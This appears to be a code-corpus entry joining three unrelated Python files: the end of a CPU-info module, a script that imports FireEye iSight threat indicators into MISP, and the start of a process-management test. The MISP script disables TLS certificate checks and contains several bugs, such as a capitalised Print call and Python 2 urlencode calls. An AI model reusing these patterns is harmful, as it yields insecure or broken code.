CopyNewFields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
CopyNewFields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
CopyNewFields(info, _get_cpu_info_from_lscpu())
# Try sysctl
CopyNewFields(info, _get_cpu_info_from_sysctl())
# Try kstat
CopyNewFields(info, _get_cpu_info_from_kstat())
# Try dmesg
CopyNewFields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
CopyNewFields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
CopyNewFields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
CopyNewFields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
CopyNewFields(info, _get_cpu_info_from_cpuid())
return info
# Make sure we are running on a supported system
def _check_arch():
arch, bits = parse_arch(DataSource.raw_arch_string)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64']:
raise Exception("py-cpuinfo currently only works on X86 and some PPC and ARM CPUs.")
def main():
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = get_cpu_info()
if info:
print('Python Version: {0}'.format(info.get('python_version', '')))
print('Cpuinfo Version: {0}'.format(info.get('cpuinfo_version', '')))
print('Vendor ID: {0}'.format(info.get('vendor_id', '')))
print('Hardware Raw: {0}'.format(info.get('hardware', '')))
print('Brand: {0}'.format(info.get('brand', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Hz Advertised Raw: {0}'.format(info.get('hz_advertised_raw', '')))
print('Hz Actual Raw: {0}'.format(info.get('hz_actual_raw', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Raw Arch String: {0}'.format(info.get('raw_arch_string', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Extended Model: {0}'.format(info.get('extended_model', '')))
print('Extended Family: {0}'.format(info.get('extended_family', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
else:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if __name__ == '__main__':
from multiprocessing import freeze_support
freeze_support()
main()
else:
_check_arch()
|
PySight2.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sep 20, 2016
Modified: May 2020
@author: deralexxx
Script to pull iocs from iSight and push them to MISP
Modified by: Douglas Molina
Alexander Jaeger
See CHANGELOG.md for history
"""
import datetime
import email.utils
import hashlib
import hmac
import json
import os
from pymisp import ExpandedPyMISP, MISPEvent, MISPObject
#from pymisp import PyMISP, MISPEvent, MISPObject
import requests
import sys
import threading
import time
import urllib.parse
import urllib3
# Read the config file.
import PySight_settings
# Import our own iSight report model.
from model.pySightReport import pySightReport
# Suppress insecure HTTPS request warnings.
urllib3.disable_warnings()
# Error handling function.
def error_handling(e, a_string):
"""
:param e:
:type e:
:param a_string:
:type a_string:
:return:
:rtype:
"""
if hasattr(e, 'message'):
PySight_settings.logger.error('%s %s', a_string, e.message)
import traceback
PySight_settings.logger.debug('1 %s', e.__doc__)
PySight_settings.logger.debug('2 %s', sys.exc_info())
PySight_settings.logger.debug('3 %s', sys.exc_info()[0])
PySight_settings.logger.debug('4 %s', sys.exc_info()[1])
#PySight_settings.logger.debug('5 %s', sys.exc_info()[2], 'Sorry I mean line...',
# traceback.tb_lineno(sys.exc_info()[2]))
ex_type, ex, tb = sys.exc_info()
PySight_settings.logger.debug('6 %s', traceback.print_tb(tb))
return sys, traceback
# This function is not used!
def misp_delete_events(a_start, a_end, a_misp_instance):
"""
:param a_start:
:type a_start:
:param a_end:
:type a_end:
:param a_misp_instance:
:type a_misp_instance:
:return:
:rtype:
"""
print(a_start)
print(a_end)
try:
for i in range(a_start, a_end, 1):
print(i)
a_misp_instance.delete_event(i)
return True
except TypeError as e:
print("TypeError error: %s", e.message)
return False
except Exception:
print("Unexpected error: %s", sys.exc_info())
return True
# Update an existing MISP event.
def update_misp_event(misp_instance, event, isight_alert):
# Update attributes based on the iSight report.
#
# Ideas of Alex not implemented:
# Use expanded networkIdentifier as a comment.
# Create attributes and use object relationships for iSight fields that have no corresponding MISP object attribute.
#
# Unused iSight fields: observationTime
PySight_settings.logger.debug('Updating the event %s', event)
# Verify that misp_instance is of the correct type
#if not isinstance(misp_instance, PyMISP):
if not isinstance(misp_instance, ExpandedPyMISP):
PySight_settings.logger.error('Parameter misp_instance is not a PyMISP object')
return False
# Determine whether the to_ids flag shall be set.
if isight_alert.emailIdentifier == 'Attacker' or isight_alert.emailIdentifier == 'Compromised':
email_ids = True
else:
email_ids = False
if isight_alert.fileIdentifier == 'Attacker' or isight_alert.fileIdentifier == 'Compromised':
file_ids = True
elif isight_alert.intelligenceType == 'malware':
file_ids = True
else:
file_ids = False
if isight_alert.networkIdentifier == 'Attacker' or isight_alert.networkIdentifier == 'Compromised':
network_ids = True
else:
network_ids = False
# Use malwareFamily as the default comment.
if isight_alert.malwareFamily:
default_comment = isight_alert.malwareFamily
else:
default_comment = ''
# If the alert contains email indicators, create an email object.
if isight_alert.emailIdentifier:
# If emailLanguage is provided, add it to the default comment.
if isight_alert.emailLanguage:
add_comment = 'Email language: ' + isight_alert.emailLanguage
if default_comment == '':
email_comment = add_comment
else:
email_comment = default_comment + '; ' + add_comment
else:
email_comment = default_comment
# Create the object.
email_object = MISPObject('email')
email_object.comment = email_comment
# Add attributes to the object.
if isight_alert.senderAddress:
email_object.add_attribute('from', value=isight_alert.senderAddress, to_ids=email_ids)
if isight_alert.senderName:
email_object.add_attribute('from-display-name', value=isight_alert.senderName, to_ids=False)
if isight_alert.sourceIP:
email_object.add_attribute('ip-src', value=isight_alert.sourceIP, to_ids=email_ids)
if isight_alert.subject:
email_object.add_attribute('subject', value=isight_alert.subject, to_ids=False)
if isight_alert.recipient:
email_object.add_attribute('to', value=isight_alert.recipient, to_ids=False)
if isight_alert.senderDomain:
domain_attribute = event.add_attribute(category='Network activity', type='domain',
value=isight_alert.senderDomain, to_ids=False)
email_object.add_reference(domain_attribute.uuid, 'derived-from', comment='Email source domain')
# Lastly, add the object to the event.
event.add_object(email_object)
# If the report contains an MD5 hash, create a file object.
if isight_alert.md5:
# If a file description is given, add it to the default comment.
if isight_alert.description:
add_comment = isight_alert.description
if default_comment == '':
file_comment = add_comment
else:
file_comment = default_comment + '; ' + add_comment
else:
file_comment = default_comment
# Create the object.
file_object = MISPObject('file')
file_object.comment = file_comment
# Add attributes to the object.
file_object.add_attribute('md5', value=isight_alert.md5, to_ids=file_ids)
if isight_alert.sha1:
file_object.add_attribute('sha1', value=isight_alert.sha1, to_ids=file_ids)
if isight_alert.sha256:
file_object.add_attribute('sha256', value=isight_alert.sha256, to_ids=file_ids)
if isight_alert.fileName and not isight_alert.fileName == 'UNAVAILABLE' and \
not isight_alert.fileName.upper() == 'UNKNOWN':
# Don't use filenames for detection.
file_object.add_attribute('filename', value=isight_alert.fileName, to_ids=False)
if isight_alert.fileSize:
# Don't use file size for detection.
file_object.add_attribute('size-in-bytes', value=isight_alert.fileSize, to_ids=False)
if isight_alert.fuzzyHash:
file_object.add_attribute('ssdeep', value=isight_alert.fuzzyHash, to_ids=file_ids)
if isight_alert.fileType and not isight_alert.fileType == 'fileType':
# Don't use file type for detection.
file_object.add_attribute('text', value=isight_alert.fileType, to_ids=False)
if isight_alert.fileCompilationDateTime:
# Convert epoch format to ISO86011 UTC format.
compile_date = datetime.datetime.fromtimestamp(isight_alert.fileCompilationDateTime)
file_object.add_attribute('compilation-timestamp', value=str(compile_date), to_ids=False)
if isight_alert.filePath:
file_object.add_attribute('path', value=isight_alert.filePath, to_ids=False)
# Lastly, add the object to the event.
event.add_object(file_object)
# If the report contains a user agent string, create a user-agent attribute.
if isight_alert.userAgent:
event.add_attribute(category='Network activity', type='user-agent', value=isight_alert.userAgent,
to_ids=network_ids, comment=default_comment)
# If the report contains an ASN, create an AS attribute.
if isight_alert.asn:
# Don't use the ASN for detection.
event.add_attribute(category='Network activity', type='AS', value=isight_alert.asn, to_ids=False,
comment=default_comment)
# If the report contains a domain, create a hostname attribute (because iSight domain names are in fact hostnames).
if isight_alert.domain:
# If an IP address is provided with a hostname, put the IP address in a comment, possibly in addition to the
# default network comment.
if isight_alert.ip:
add_comment = 'Resolves to ' + isight_alert.ip
if default_comment == '':
temp_comment = add_comment
else:
temp_comment = default_comment + '; ' + add_comment
else:
temp_comment = default_comment
# If a protocol is provided, also add it to the comment.
if isight_alert.protocol:
add_comment = isight_alert.protocol
if temp_comment == '':
host_comment = add_comment
else:
host_comment = temp_comment + '; ' + add_comment
else:
host_comment = temp_comment
# Add the attribute to the event. If a port is provided, use a combined attribute.
if isight_alert.port:
host_port = isight_alert.domain + '|' + isight_alert.port
new_attr = event.add_attribute(category='Network activity', type='hostname|port', value=host_port,
to_ids=network_ids, comment=host_comment)
else:
new_attr = event.add_attribute(category='Network activity', type='hostname', value=isight_alert.domain,
to_ids=network_ids, comment=host_comment)
if isight_alert.networkType == 'C&C':
# Add veris tag to attribute.
new_attr.add_tag('veris:action:malware:variety="C2"')
# If the report doesn't contain a hostname but contains an IP address, create an ip-src or ip-dst attribute.
# TODO: Is there a better way to determine whether it's a source or destination IP address?
elif isight_alert.ip:
# Add the protocol to the comment if it is provided by iSight.
if isight_alert.protocol:
add_comment = isight_alert.protocol
if default_comment == '':
ip_comment = add_comment
else:
ip_comment = default_comment + '; ' + add_comment
else:
ip_comment = default_comment
if isight_alert.networkIdentifier == 'Attacker':
# Might be source or destination, but likelihood of source is higher.
ip_type = 'ip-src'
if isight_alert.networkType == 'C&C':
ip_type = 'ip-dst'
elif isight_alert.networkIdentifier == 'Compromised':
# Might be source or destination, but likelihood of destination is higher.
ip_type = 'ip-dst'
elif isight_alert.networkIdentifier == 'Related':
# Might be source or destination, but likelihood of source is higher.
ip_type = 'ip-src'
elif isight_alert.networkIdentifier == 'Victim':
# Might be source or destination, but likelihood of destination is higher.
ip_type = 'ip-dst'
else:
# Might be source or destination, but likelihood of source is higher.
ip_type = 'ip-src'
if isight_alert.port:
# If a port is provided, it's likely a destination IP address.
ip_type = 'ip-dst'
type_combo = ip_type + '|port'
ip_port = isight_alert.ip + '|' + isight_alert.port
new_attr = event.add_attribute(category='Network activity', type=type_combo, value=ip_port,
to_ids=network_ids, comment=ip_comment)
else:
new_attr = event.add_attribute(category='Network activity', type=ip_type, value=isight_alert.ip,
to_ids=network_ids, comment=ip_comment)
if isight_alert.networkType == 'C&C':
# Add veris tag to attribute.
new_attr.add_tag('veris:action:malware:variety="C2"')
# If the report contains a domain registrant email address, then create a whois attribute.
if isight_alert.registrantEmail:
whois_object = MISPObject('whois')
whois_object.comment = default_comment
whois_object.add_attribute('registrant-email', value=isight_alert.registrantEmail, to_ids=network_ids)
if isight_alert.registrantName:
whois_object.add_attribute('registrant-name', value=isight_alert.registrantName, to_ids=False)
if isight_alert.domain:
whois_object.add_attribute('domain', value=isight_alert.domain, to_ids=network_ids)
elif isight_alert.sourceDomain:
whois_object.add_attribute('domain', value=isight_alert.sourceDomain, to_ids=network_ids)
event.add_object(whois_object)
# If the report contains a URL, create a url attribute.
if isight_alert.url:
event.add_attribute(category='Network activity', type='url', value=isight_alert.url, to_ids=network_ids,
comment=default_comment)
if isight_alert.networkType == 'C&C':
# Add veris tag to attribute.
event.add_attribute_tag('veris:action:malware:variety="C2"', isight_alert.url)
# If the report contains registry information, create a regkey attribute.
# Ideally, the registry field would be split into hive, key and value.
if isight_alert.registry:
# If a file description is given, add it to the default comment.
if isight_alert.description:
add_comment = isight_alert.description
if default_comment == '':
reg_comment = add_comment
else:
reg_comment = default_comment + '; ' + add_comment
else:
reg_comment = default_comment
event.add_attribute(category='Artifacts dropped', type='regkey', value=isight_alert.registry, to_ids=file_ids,
comment=reg_comment)
# If the report contains a malware family, create a malware-type attribute.
if isight_alert.malwareFamily:
event.add_attribute(category='Antivirus detection', type='text', value=isight_alert.malwareFamily,
to_ids=False)
# If the report contains an actor, create a threat-actor attribute.
if isight_alert.actor:
# Don't use the threat actor for detection.
event.add_attribute(category='Attribution', type='threat-actor', value=isight_alert.actor, to_ids=False)
# Finally, commit the event additions to the MISP instance.
misp_instance.update_event(event)
# Lastly, publish the event without sending an alert email.
# This command expects the event ID instead of a MISPevent as argument.
misp_instance.publish(event['id'], alert=False)
# Create a new MISP event.
def create_misp_event(misp_instance, isight_report_instance):
# No MISP event for this iSight report ID exists yet.
# Alas, create a new MISP event.
# Convert the publication date of the iSight report into a datetime object.
if isight_report_instance.publishDate:
date = datetime.datetime.fromtimestamp(isight_report_instance.publishDate)
else:
# If iSight doesn't provide a date, use today's date.
date = datetime.datetime.now(datetime.timezone.utc)
# Create a MISP event from the FireEye iSight report with the following parameters.
print('****create new event*****')
event = MISPEvent()
event.distribution = 1 # This community only
if isight_report_instance.riskRating == 'CRITICAL' or isight_report_instance.riskRating == 'Critical':
event.threat_level_id = 1 # High
elif isight_report_instance.riskRating == 'HIGH' or isight_report_instance.riskRating == 'High':
event.threat_level_id = 1 # High
elif isight_report_instance.riskRating == 'MEDIUM' or isight_report_instance.riskRating == 'Medium':
event.threat_level_id = 2 # Medium
elif isight_report_instance.riskRating == 'LOW' or isight_report_instance.riskRating == 'Low':
event.threat_level_id = 3 # Low
else:
event.threat_level_id = 4 # Unknown
event.analysis = 2 # Completed
event.info = "iSIGHT: " + isight_report_instance.title
event.date = date
# Push the event to the MISP server.
my_event = misp_instance.add_event(event, pythonify=True)
print("#######Push event to MISP server####",my_event)
PySight_settings.logger.debug('Created MISP event %s for iSight report %s', event, isight_report_instance.reportId)
# Add default tags to the event.
misp_instance.tag(my_event, 'basf:classification="internal"')
#misp_instance.tag(my_event, 'basf:source="iSight"')
misp_instance.tag(my_event, 'CTI feed: Fireeye:iSight')
misp_instance.tag(my_event, 'tlp:amber')
# Use some iSight ThreatScapes for event tagging. Reports can have multiple ThreatScapes.
if 'Cyber Espionage' in isight_report_instance.ThreatScape:
# VERIS distinguishes between external, internal or partner actors. This difference is not yet implemented in
# MISP. External would be most likely.
#misp_instance.tag(my_event, 'veris:actor:external:motive="Espionage"')
misp_instance.tag(my_event, 'veris:actor:motive="Espionage"')
if 'Hacktivism' in isight_report_instance.ThreatScape:
misp_instance.tag(my_event, 'veris:actor:external:variety="Activist"')
if 'Critical Infrastructure' in isight_report_instance.ThreatScape:
misp_instance.tag(my_event, 'basf:technology="OT"')
if 'Cyber Physical' in isight_report_instance.ThreatScape:
misp_instance.tag(my_event, 'basf:technology="OT"')
if 'Cyber Crime' in isight_report_instance.ThreatScape:
misp_instance.tag(my_event, 'veris:actor:external:variety="Organized crime"')
# Add the iSight report ID and web link as attributes.
if isight_report_instance.reportId:
misp_instance.add_attribute(my_event, {'category': 'External analysis', 'type': 'text', 'to_ids': False,
'value': isight_report_instance.reportId}, pythonify=True)
if isight_report_instance.webLink:
misp_instance.add_attribute(my_event, {'category': 'External analysis', 'type': 'link', 'to_ids': False,
'value': isight_report_instance.webLink}, pythonify=True)
# Put the ThreatScape into an Attribution attribute, but disable correlation.
if isight_report_instance.ThreatScape:
misp_instance.add_attribute(my_event, {'category': 'Attribution', 'type': 'text', 'to_ids': False,
'value': isight_report_instance.ThreatScape,
'disable_correlation': True}, pythonify=True)
# Add specific attributes from this iSight report.
update_misp_event(misp_instance, my_event, isight_report_instance)
# Retrieve the event ID of an event.
def check_misp_all_results(a_result):
"""
:param a_result:
:type a_result:
:return: previous event from MISP
:rtype:
"""
# PySight_settings.logger.debug('Checking %s if it contains previous events', a_result)
if 'message' in a_result:
if a_result['message'] == 'No matches.':
PySight_settings.logger.error('No existing MISP event found')
# has really no event
return False
elif 'Event' in a_result[0]:
previous_event = a_result[0]['Event']['id']
PySight_settings.logger.debug('Found an existing MISP event with ID %s', previous_event)
return previous_event
else:
for e in a_result['response']:
previous_event = e['Event']['id']
PySight_settings.logger.debug('Found an existing MISP event with ID %s', previous_event)
return previous_event
# Check whether there already exists a MISP event for a specific FireEye iSight report.
def misp_check_for_previous_event(misp_instance, isight_alert):
"""
Default: No event exists for this iSight report ID.
:param misp_instance:
:type misp_instance:
:param isight_alert:
:type isight_alert:
:return:
event id if an event is there
false if no event exists yet
:rtype:
"""
event = False
if misp_instance is None:
PySight_settings.logger.error('No MISP instance provided')
return False
# Search based on report ID.
if isight_alert.reportId:
result = misp_instance.search(value=isight_alert.reportId, type_attribute='text', category='External analysis')
# If something was found in the MISP instance, then retrieve the event
if result:
event = check_misp_all_results(result)
# If no event found, search based on report URL.
if isight_alert.webLink and not event:
result = misp_instance.search(value=isight_alert.webLink, type_attribute='link', category='External analysis')
# If something was found in the MISP instance, then retrieve the event
if result:
event = check_misp_all_results(result)
if not result:
PySight_settings.logger.debug('Found no existing event for iSight report ID %s', isight_alert.reportId)
return event
# Generate a PyMISP instance.
def get_misp_instance():
print('*******get misp instance()********')
"""
:return: MISP Instance
:rtype: PyMISP
"""
# Proxy settings are taken from the config file and converted to a dict.
if PySight_settings.USE_MISP_PROXY:
misp_proxies = {
'http': str(PySight_settings.proxy_address),
'https': str(PySight_settings.proxy_address)
}
else:
misp_proxies = {}
try:
# URL of the MISP instance, API key and SSL certificate validation are taken from the config file.
return ExpandedPyMISP(PySight_settings.misp_url, PySight_settings.misp_key, PySight_settings.misp_verifycert,
proxies=misp_proxies)
#return PyMISP(PySight_settings.misp_url, PySight_settings.misp_key, PySight_settings.misp_verifycert,
# proxies=misp_proxies)
except Exception:
PySight_settings.logger.error('Unexpected error in MISP init: %s', sys.exc_info())
return False
# Process one FireEye iSight report and convert it into a MISP events.
def process_isight_indicator(a_json):
"""
Create a pySightAlert instance of the json and make all the mappings
:param a_json:
:type a_json:
"""
try:
# Get a MISP instance per thread
this_misp_instance = get_misp_instance()
print('********',this_misp_instance,'*******')
# Without a MISP instance this does not make sense
if this_misp_instance is False:
raise ValueError("No MISP instance found.")
# Acquire a semaphore (decrease the counter in the semaphore).
if PySight_settings.use_threading:
thread_limiter.acquire()
# PySight_settings.logger.debug("max number %s current number: ", thread_limiter._initial_value, )
# Parse the FireEye iSight report
isight_report_instance = pySightReport(a_json)
# If in DEBUG mode, write the iSight reports to a file.
if PySight_settings.debug_mode:
# Create the "reports" subdirectory for storing iSight reports, if it doesn't exist already.
if not os.path.exists("reports"):
os.makedirs("reports")
f = open("reports/" + isight_report_instance.reportId, 'a')
# Write the iSight report into the "reports" subdirectory.
f.write(json.dumps(a_json, sort_keys=True, indent=4, separators=(',', ': ')))
f.close()
# Check whether we already have an event for this reportID.
PySight_settings.logger.debug('Checking for existing event with report ID %s', isight_report_instance.reportId)
event_id = misp_check_for_previous_event(this_misp_instance, isight_report_instance)
if not event_id:
# Create a new MISP event
PySight_settings.logger.debug('No event found for report ID %s -- will create a new one',
isight_report_instance.reportId)
print('***create new MISP event****')
create_misp_event(this_misp_instance, isight_report_instance)
else:
# Add the data to the found event
event = this_misp_instance.get_event(event_id, pythonify=True)
update_misp_event(this_misp_instance, event, isight_report_instance)
# Reset the iSight report instance when done.
isight_report_instance = None
# Release the semaphore (increase the counter in the semaphore).
if PySight_settings.use_threading:
thread_limiter.release()
except AttributeError as e_AttributeError:
sys, traceback = error_handling(e_AttributeError, a_string="Attribute Error")
return False
except TypeError as e_TypeError:
sys, traceback = error_handling(e_TypeError, a_string="Type Error:")
return False
except Exception as e_Exception:
sys, traceback = error_handling(e_Exception, a_string="General Error:")
return False
# Process all FireEye iSight reports and convert them to MISP events.
def misp_process_isight_indicators(a_result):
"""
:param a_result:
:type a_result:
"""
# Process each indicator in the JSON message
for indicator in a_result['message']:
PySight_settings.logger.debug('Processing report %s', indicator['reportId'])
if PySight_settings.use_threading:
# Use threads to process the indicators
print('***threading****')
# First, set the maximum number of threads
thread_limiter = threading.BoundedSemaphore(value=PySight_settings.number_threads)
# Define a thread
t = threading.Thread(target=process_isight_indicator, args=(indicator,))
# Start the thread
t.start()
else:
# No threading
print('***no threading***')
process_isight_indicator(indicator)
# Make the FireEye iSight API request.
def isight_load_data(a_url, a_query, a_header):
"""
:param a_url:
:type a_url:
:param a_query:
:type a_query:
:param a_header:
:type a_header:
:return:
:rtype:
"""
# This is the URL for the iSight API query
url_to_load = a_url + a_query
print('******url to load:',url_to_load)
# Set the proxy if specified
if PySight_settings.USE_ISIGHT_PROXY:
isight_proxies = {
'http': PySight_settings.proxy_address,
'https': PySight_settings.proxy_address
}
PySight_settings.logger.debug('Connecting to FireEye iSight via proxy %s', PySight_settings.proxy_address)
else:
isight_proxies = {}
PySight_settings.logger.debug('Connecting directly to FireEye iSight without a proxy')
PySight_settings.logger.debug('FireEye iSight request URL: %s', url_to_load)
PySight_settings.logger.debug('FireEye iSight request header: %s', a_header)
try:
r = requests.get(url_to_load, headers=a_header, proxies=isight_proxies, verify=False)
except urllib.error.HTTPError as e:
PySight_settings.logger.error('Urllib HTTP error code: %s', e.code)
PySight_settings.logger.error('Urllib HTTP error message: %s', e.read())
except requests.exceptions.ChunkedEncodingError as e:
PySight_settings.logger.error('Error when connecting to the FireEye iSight API: %s', e)
return False
if r.status_code == 204:
PySight_settings.logger.warning('No result found for search')
return False
elif r.status_code == 404:
PySight_settings.logger.error('%s: check the FireEye iSight API URL', r.reason)
PySight_settings.logger.debug('%s', r.text)
return False
elif r.status_code != 200:
PySight_settings.logger.error('Request not successful: %s', r.text)
return False
return_data_cleaned = r.text.replace('\n', '')
json_return_data_cleaned = json.loads(return_data_cleaned)
PySight_settings.logger.debug('Number of indicators returned: %s', len(json_return_data_cleaned['message']))
if not json_return_data_cleaned['success']:
PySight_settings.logger.error('Error with the FireEye iSight API connection %s',
json_return_data_cleaned['message']['description'])
PySight_settings.logger.debug(json_return_data_cleaned)
return False
else:
# For debugging purposes, write the returned IOCs to a file
if PySight_settings.debug_mode:
timestring = datetime.datetime.now(datetime.timezone.utc).strftime('%Y%m%d-%H%M%S')
if not os.path.exists('debug'):
os.makedirs('debug')
f = open('debug/' + timestring, 'w')
f.write(json.dumps(json_return_data_cleaned, sort_keys=True, indent=6, separators=(',', ': ')))
f.close()
return json_return_data_cleaned
# Define the header for the HTTP requests to the iSight API.
def set_header(a_prv_key, a_pub_key, a_query):
"""
:param a_prv_key:
:type a_prv_key:
:param a_pub_key:
:type a_pub_key:
:param a_query:
:type a_query:
:return: Header for iSight search
:rtype:
"""
# Prepare the data to calculate the X-Auth-Hash.
print('***set header***')
accept_version = '2.5'
output_format = 'application/json'
time_stamp = email.utils.formatdate(localtime=True)
string_to_hash = a_query + accept_version + output_format + time_stamp
# Convert the authentication information from UTF-8 encoding to a bytes object
message = bytes(string_to_hash, 'utf-8')
secret = bytes(a_prv_key, 'utf-8')
# Hash the authentication information
hashed = hmac.new(secret, message, hashlib.sha256)
header = {
'X-Auth': a_pub_key,
'X-Auth-Hash': hashed.hexdigest(),
'Accept': output_format,
'Accept-Version': accept_version,
'Date': time_stamp
}
return header
# Prepare the request to the FireEye iSight API.
def isight_prepare_data_request(a_url, a_query, a_pub_key, a_prv_key):
"""
:param a_url:
:type a_url:
:param a_query:
:type a_query:
:param a_pub_key:
:type a_pub_key:
:param a_prv_key:
:type a_prv_key:
:return:
:rtype:
"""
header = set_header(a_prv_key, a_pub_key, a_query)
result = isight_load_data(a_url, a_query, header)
print('######header:',header)
print('#####result:',result)
if not result:
PySight_settings.logger.error('Something went wrong when retrieving indicators from the FireEye iSight API')
return False
else:
return result
# Search for FireEye iSight reports published since the specified last hours.
def isight_search_indicators(base_url, public_key, private_key, hours):
# Convert hours to seconds and subtract them from the current time
since = int(time.time()) - hours * 60 * 60
# Limit the returned data to that published since this Epoch datetime and the present time.
# Therefore, add the 'since' parameter as a query string.
params = {
'since': since
}
search_query = '/view/indicators?' + urllib.parse.urlencode(params)
# Retrieve indicators and warning data since the specified date and time.
return isight_prepare_data_request(base_url, search_query, public_key, private_key)
# This function is called from test_pysight.py but otherwise not used.
def data_search_report(url, public_key, private_key, a_reportid):
print("text_search_wildcard Response:")
# wild card text search
# FIXME: not used
# params = {
# 'reportID': a_reportid
# }
text_search_query = '/report/' + a_reportid
isight_prepare_data_request(url, text_search_query, public_key, private_key)
# This function is not used.
def data_text_search_title(url, public_key, private_key):
print("text_search_title Response:")
# title phrase search
params = {
'text': 'title:"Software Stack 3.1.2"'
}
text_search_query = '/search/text?' + urllib.urlencode(params)
isight_prepare_data_request(url, text_search_query, public_key, private_key)
# This function is not used.
def data_text_search_wildcard(url, public_key, private_key):
print("text_search_wildcard Response:")
# wild card text search
params = {
'text': 'zero-day*',
'limit': '10',
'offset': '0'
}
text_search_query = '/search/text?' + urllib.urlencode(params)
isight_prepare_data_request(url, text_search_query, public_key, private_key)
# This function is not used.
def data_text_search_sensitive_reports(url, public_key, private_key):
print("text_search_sensitive_reports Response:")
params = {
'text': 'title:"Latin American"',
'customerIntelOnly': True
}
text_search_query = '/search/text?' + urllib.urlencode(params)
isight_prepare_data_request(url, text_search_query, public_key, private_key)
# This function is not used.
def data_advanced_search_filter_indicators(url, public_key, private_key):
print("advanced_search_filter_indicators Response:")
# Indicator field md5
advanced_search_query = '/search/advanced?query=md5=~8512835a95d0fabfb&fileIdentifier=[Victim;Attacker]'
isight_prepare_data_request(url, advanced_search_query, public_key, private_key)
# This function is not used.
def data_basic_search_ip(url, public_key, private_key, ip):
PySight_settings.logger.debug("basic_search Response")
# Query for search
basic_search_query = '/search/basic?ip=' + ip
isight_prepare_data_request(url, basic_search_query, public_key, private_key)
# This function is not used.
def data_ioc(url, public_key, private_key):
# print ("iocs Response:")
# 30 days back start date
start_date = int(time.time()) - 2592000
end_date = int(time.time())
ioc_query = '/view/iocs?' + 'start_date=' + str(start_date) + '&end_date=' + str(end_date)
return isight_prepare_data_request(url, ioc_query, public_key, private_key)
# This function is not used.
def data_text_search_simple(url, public_key, private_key):
print("text_search_simple Response:")
# simple text search
params = {
'text': 'Stack-Based Buffer Overflow Vulnerability',
'limit': '10',
'offset': '0'
}
text_search_query = '/search/text?' + urllib.urlencode(params)
isight_prepare_data_request(url, text_search_query, public_key, private_key)
# This function is not used.
def data_text_search_filter(url, public_key, private_key):
try:
print("text_search_filter Response:")
# filter text search
params = {
'text': 'malware',
'filter': 'threatScape:cyberEspionage,cyberCrime&riskRating:HIGH,LOW&language:english',
'sortBy': 'title:asc,reportId:desc',
'limit': '10',
'offset': '5'
}
text_search_query = '/search/text?' + urllib.urlencode(params)
print('text_search_query', text_search_query)
isight_prepare_data_request(url, text_search_query, public_key, private_key)
params = {
'text': 'malware',
'filter': 'cveId:~\'CVE\''
}
text_search_query = '/search/text?' + urllib.urlencode(params)
return isight_prepare_data_request(url, text_search_query, public_key, private_key)
except Exception:
return False
if __name__ == '__main__':
# If loglevel equals DEBUG, log the time the script ran.
PySight_settings.logger.info('PySight2MISP started at %s', datetime.datetime.now(datetime.timezone.utc))
if PySight_settings.debug_mode:
# This is to log the time used to run the script
from timeit import default_timer as timer
start = timer()
# Retrieve FireEye iSight indicators of the last x hours
print('#######hello########')
result = isight_search_indicators(PySight_settings.isight_url, PySight_settings.isight_pub_key,PySight_settings.isight_priv_key, PySight_settings.isight_last_hours)
# PySight_settings.logger.info("url:",PySight_settings.isight_url,"pubkey:", PySight_settings.isight_pub_key,"priv_key:",PySight_settings.isight_priv_key,"hrs",PySight_settings_last_hours)
print('result',result)
if result is False:
PySight_settings.logger.debug('No indicators available from FireEye iSight')
else:
misp_process_isight_indicators(result)
PySight_settings.logger.debug('PySight2MISP finished at %s', datetime.datetime.now(datetime.timezone.utc))
# If loglevel equals DEBUG, log the time the script ran.
if PySight_settings.debug_mode:
end = timer()
PySight_settings.logger.debug('Time taken %s', end - start)
Print('######Script Done #######')
# data_ioc(url, public_key, private_key)
# data_text_search_simple(isight_url, public_key, private_key)
# data_text_search_filter(isight_url, public_key, private_key)
# data_text_search_title(url, public_key, private_key)
# data_text_search_wildcard(url, public_key, private_key)
# data_text_search_sensitive_reports(isight_url, public_key, private_key)
# data_advanced_search_filter_indicators(url, public_key, private_key)
|
test_processfamily.py
|
__author__ = 'matth'
import unittest
import sys
from processfamily.test import ParentProcess, Config
import os
import subprocess
import requests
import time
import socket
import logging
import glob
from processfamily.processes import process_exists, kill_process, AccessDeniedError
from processfamily import _traceback_str
import signal
import threading
if sys.platform.startswith('win'):
from processfamily._winprocess_ctypes import CAN_USE_EXTENDED_STARTUPINFO, CREATE_BREAKAWAY_FROM_JOB
class _BaseProcessFamilyFunkyWebServerTestSuite(unittest.TestCase):
skip_crash_test = None
def setUp(self):
self.pid_dir = os.path.join(os.path.dirname(__file__), 'test', 'tmp', 'pid')
if not os.path.exists(self.pid_dir):
os.makedirs(self.pid_dir)
for pid_file in self.get_pid_files():
with open(pid_file, "r") as f:
pid = f.read().strip()
if pid and self.process_exists_or_access_denied(int(pid)):
logging.warning(
("Process with pid %s is stilling running. This could be a problem " + \
"(but it might be a new process with a recycled pid so I'm not killing it).") % pid )
else:
os.remove(pid_file)
